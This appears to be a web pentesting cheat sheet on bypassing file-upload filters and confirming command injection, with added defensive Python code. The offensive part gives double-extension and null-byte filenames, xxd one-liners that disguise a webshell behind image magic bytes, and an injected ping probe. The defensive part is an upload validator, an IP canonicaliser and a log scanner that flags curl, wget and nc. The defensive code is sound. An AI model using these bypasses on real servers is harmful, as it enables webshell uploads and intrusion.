User Endpoints
File Upload Filtering
Executable extensions
.php -> Standard extension for PHP scripts.
.php5 -> Used for PHP version 5 scripts.
.phtml -> PHP scripts with an alternative extension, often for compatibility or aesthetic reasons.
.pht -> Less common extension, used for PHP files; sometimes bypasses naive filters.
.phps -> Typically used for PHP source code highlighting.
.php3 -> Extension for older PHP 3 scripts; still valid in some configurations.
.asp -> Active Server Pages, Microsoft’s server-side scripting technology.
.aspx -> ASP.NET pages, used for dynamic web content on Microsoft platforms.
.jsp -> JavaServer Pages, used for dynamic web applications in Java environments.
Test filters
There are normally three ways a web server will check for valid file types by comparing them to an allow- or deny-list:
File extension
    Double extensions: .png.php, .jpg.php, .png.asp, .gif.jsp
    Null byte injection: file.php%00.jpg, file.asp%00.png
Content-Type headers
    Executable types: application/x-php, application/x-sh, application/x-msdownload, application/x-python-code
    Image types: image/png, image/jpeg, image/gif, image/bmp, image/svg+xml
    MIME confusion: text/html instead of application/json, or text/plain, to trick servers.
Magic bytes (file signature)
    Online hex editor -> HexED.it
    echo "89504e470d0a1a0a" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.png
    echo "ffd8ff" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.jpg
    echo "47494638" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.gif
    echo "25504446" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.pdf
    echo "504b0304" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.zip
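The three checks above are only a filter if they are applied together and required to agree. The following is an added example, not code from the original page: a server-side upload validator that enforces a single allow-listed extension (so double extensions and null bytes fail), requires the client's Content-Type to match that extension, checks the same file signatures the xxd commands write, and then rejects a valid header that is followed by script source, which is exactly the polyglot those commands produce. ALLOWED_TYPES, SCRIPT_MARKERS and validate_upload are this example's own names; the sample bytes are constructed.

```python
# Added example, not code from the original page: a defensive upload validator
# that applies the three checks listed above (extension, Content-Type, magic
# bytes) and requires all of them to agree. ALLOWED_TYPES, SCRIPT_MARKERS and
# validate_upload are this example's own names.

# Canonical extension -> (required Content-Type, required leading bytes).
# The signatures are the same ones the page's xxd commands write.
ALLOWED_TYPES = {
    "png": ("image/png", bytes.fromhex("89504e470d0a1a0a")),
    "jpg": ("image/jpeg", bytes.fromhex("ffd8ff")),
    "gif": ("image/gif", bytes.fromhex("47494638")),
    "pdf": ("application/pdf", bytes.fromhex("25504446")),
}

# Source markers a polyglot (valid header followed by a script body) would carry.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


def validate_upload(filename, content_type, data):
    """Return (accepted, reason). Accepted only when every check agrees."""
    # Null bytes: reject instead of letting a lower layer truncate "shell.php\0.jpg".
    if "\x00" in filename or "%00" in filename.lower():
        return False, "null byte in filename"
    # Drop any directory components the client sent.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = name.lower().split(".")
    # Exactly one extension: "shell.png.php" and "shell.php.png" both fail here.
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "filename must be name.ext with a single extension"
    ext = "jpg" if parts[1] == "jpeg" else parts[1]
    if ext not in ALLOWED_TYPES:
        return False, "extension ." + parts[1] + " not allowed"
    required_ct, magic = ALLOWED_TYPES[ext]
    # Content-Type is client-controlled: it must match, but is never trusted alone.
    if content_type.split(";", 1)[0].strip().lower() != required_ct:
        return False, "Content-Type does not match extension"
    if not data.startswith(magic):
        return False, "file signature does not match extension"
    # Correct header + script source is the polyglot the xxd commands build.
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script marker found after valid signature"
    return True, "ok"


# Constructed samples: a benign PNG stub and a PNG-header + PHP polyglot.
GOOD_PNG = ALLOWED_TYPES["png"][1] + b"\x00" * 16
POLYGLOT_PNG = ALLOWED_TYPES["png"][1] + b"<?php echo 'polyglot'; ?>"

if __name__ == "__main__":
    for args in [
        ("cat.png", "image/png", GOOD_PNG),
        ("cat.png.php", "image/png", GOOD_PNG),
        ("cat.php%00.png", "image/png", GOOD_PNG),
        ("cat.png", "image/png", POLYGLOT_PNG),
        ("cat.jpg", "image/png", GOOD_PNG),
    ]:
        print(args[0], "->", validate_upload(*args))
```

The marker scan is a heuristic (byte sequences such as `<%` can legitimately occur inside compressed image data), so in production it is a secondary check behind re-encoding images with an image library, storing uploads outside the web root and serving them with a fixed Content-Type and no script handler.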
Check Input Sanitation/Validation
Submit special characters in the request -> !@$%^&
On Linux, IP addresses can be written in decimal and hex; this can be useful if dots are blacklisted.
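Blacklisting dots fails because the address is interpreted by the resolver, not by the string check. The following is an added example, not code from the original page, showing the defender's fix: parse every form a libc-style resolver accepts (a whole-number decimal or hex address as the page describes, and, going a step further, per-octet hex and octal) into a canonical address, and evaluate policy on the parsed value. canonical_ipv4 and is_internal_target are this example's own names.

```python
import ipaddress
import re

# Added example, not from the original page: canonicalise the alternative IPv4
# spellings the page mentions (whole-number decimal, hex) plus per-octet hex and
# octal, then evaluate policy on the parsed address rather than the raw string.
# canonical_ipv4 and is_internal_target are this example's own names.

_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]+")
_DEC = re.compile(r"[0-9]+")


def _parse_part(text):
    """Parse one numeric component like C's inet_aton: 0x.. hex, 0.. octal, else decimal."""
    if _HEX.fullmatch(text):
        return int(text, 16)
    if _OCT.fullmatch(text):
        return int(text, 8)
    if _DEC.fullmatch(text):
        return int(text, 10)
    raise ValueError("not a numeric component: %r" % text)


def canonical_ipv4(text):
    """Return the IPv4Address a libc-style parser would derive from text.

    Accepts a single 32-bit number (decimal, hex or octal) or four components,
    each in any of those bases. Two- and three-component forms, which inet_aton
    also accepts, are deliberately rejected rather than guessed at.
    """
    parts = text.strip().split(".")
    if len(parts) == 1:
        value = _parse_part(parts[0])
        if value > 0xFFFFFFFF:
            raise ValueError("address out of range")
    elif len(parts) == 4:
        octets = [_parse_part(p) for p in parts]
        if any(o > 255 for o in octets):
            raise ValueError("octet out of range")
        value = (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]
    else:
        raise ValueError("unsupported address form")
    return ipaddress.IPv4Address(value)


def is_internal_target(text):
    """True for loopback, private, link-local, reserved or unparsable input (fail closed)."""
    try:
        addr = canonical_ipv4(text)
    except ValueError:
        return True
    return not addr.is_global


if __name__ == "__main__":
    # Constructed inputs: the same loopback address in four spellings, one public address.
    for sample in ["2130706433", "0x7f000001", "0177.0.0.1", "127.0.0.1", "93.184.216.34"]:
        print(sample, "->", is_internal_target(sample))
```

The policy decision (`is_internal_target`) never looks at the original string, so no spelling of an address can slip past it; unparsable input is treated as internal so the check fails closed.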
Prove the Injection
If you find a command injection, test whether the system can establish outbound connections to an external server:
ping+10.10.10.10
And wait for it with tcpdump:
tcpdump -i tun0 icmp
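Both probes above leave a trace in the web server's access log: the special-character submission and the injected `ping` both arrive as query-string values. The following is an added example, not code from the original page, showing the detection side: decode each parameter of constructed access-log lines and flag shell metacharacters and an injected outbound probe command. The log lines are constructed samples and every name (ACCESS_LOG, INDICATORS, decode_query, scan_access_log) is this example's own.

```python
import re
from urllib.parse import unquote_plus

# Added example, not from the original page: a detection pass over web access
# logs that decodes each query parameter and flags the indicators the page
# discusses (shell metacharacters from special-character probing, and an
# injected outbound probe such as "ping <ip>"). The log lines are constructed
# samples and every name below is this example's own.

ACCESS_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /ping?host=10.10.10.10 HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /ping?host=10.10.10.10;ping+10.10.10.10 HTTP/1.1" 200 640',
    '10.0.0.5 - - [12/Mar/2024:10:01:15 +0000] "GET /ping?host=10.10.10.10%7Cid HTTP/1.1" 200 600',
    '10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "GET /search?q=%24%28whoami%29 HTTP/1.1" 200 300',
    '10.0.0.8 - - [12/Mar/2024:10:03:00 +0000] "GET /static/logo.png HTTP/1.1" 200 9000',
]

_REQUEST = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Indicator name -> pattern, evaluated on the *decoded* parameter value.
INDICATORS = [
    ("shell metacharacter", re.compile(r"[;|&`\n]|\$\(|\$\{")),
    ("outbound probe command", re.compile(r"\b(ping|curl|wget|nslookup|nc)\s+\S")),
]


def decode_query(target):
    """Split '/path?a=1&b=2' into (path, [(key, decoded_value), ...])."""
    path, _, query = target.partition("?")
    pairs = []
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        # unquote_plus turns %XX escapes back into bytes and '+' into a space,
        # so "ping+10.10.10.10" is seen as the command line it becomes on the server.
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return path, pairs


def scan_access_log(lines):
    """Return one finding per parameter value that matches at least one indicator."""
    findings = []
    for line in lines:
        m = _REQUEST.match(line)
        if not m:
            continue
        path, pairs = decode_query(m.group("target"))
        for key, value in pairs:
            hits = [name for name, pat in INDICATORS if pat.search(value)]
            if hits:
                findings.append({
                    "client": m.group("client"),
                    "path": path,
                    "param": key,
                    "value": value,
                    "indicators": hits,
                })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(ACCESS_LOG):
        print(finding)
```

Decoding before matching matters: `%7C` and `%24%28` only become `|` and `$(` after URL decoding, and a rule that matched the raw line would miss them. Correlating a flagged request with ICMP from the web server to an address that appeared in that request (the page's tcpdump view from the other side) turns a suspicion into a confirmed injection.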